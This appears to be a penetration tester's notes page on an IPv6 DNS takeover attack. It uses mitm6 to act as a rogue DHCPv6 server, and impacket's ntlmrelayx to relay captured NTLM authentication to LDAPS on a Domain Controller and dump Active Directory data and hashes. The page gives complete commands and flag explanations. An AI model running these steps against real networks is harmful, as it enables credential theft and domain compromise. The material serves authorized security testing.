mitm6

Repeat clients, and even newer ones, are now catching onto NBNS/LLMNR spoofing and disabling both of them. Therefore, we can try mitm6 which acts likes a DHCPv6 server on the clients network and leases out IPv6 addresses to all hosts on the local subnet, which is preferred over IPv4. Additionally, we can spoof replies for resources similtar to with Responder and try to relay authentication requests to targets we want. This can be used to relay to SMB targets or LDAP targets.

You'll want to use two panels in the same terminal window to run this effectively.

In the first panel we want to run mitm6

cd /opt
git clone https://github.com/dirkjanm/mitm6.git
cd mitm6
python3 setup.py install
cd mitm6
python3 mitm6 -d <client domain>

In the second panel, we need to run ntlmrelayx.

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -t ldaps://<Domain Controller IPv4 Address> -wh fakepad.chsdomain.local -l loot -of hashes

• -6 = Tells it to run on IPv6

• -t = Target. In the above example, we are relaying authentication requests to LDAPS on the Domain Controller.

• -wh = Sets a fake wpad file for clients to request and authenticate to.

• -l = Specifies a location for a loot folder which will include usernames, groups, comments, etc. from Active Directory.

• -of = output file of hashes obtained

The following video may be a good reference to get started by TheCyberMentor → Domain Admin via IPv6 DNS Takeover

Note: If either the Domain Controller or the user account you are relaying exist in a different subdomain then ntlmrelayx will give a SUCCEED message, but not do anything except throw an index out of range error (screenshot below). To fix this run the same command for ntlmrelayx; however, instead of specifying the DC IPv4 address use the FQDN (e.g. instead of using ldaps://192.168.0.1 use ldaps://corp.exampledomain.com). More information can be seen from a github issue post → https://github.com/dirkjanm/PrivExchange/issues/7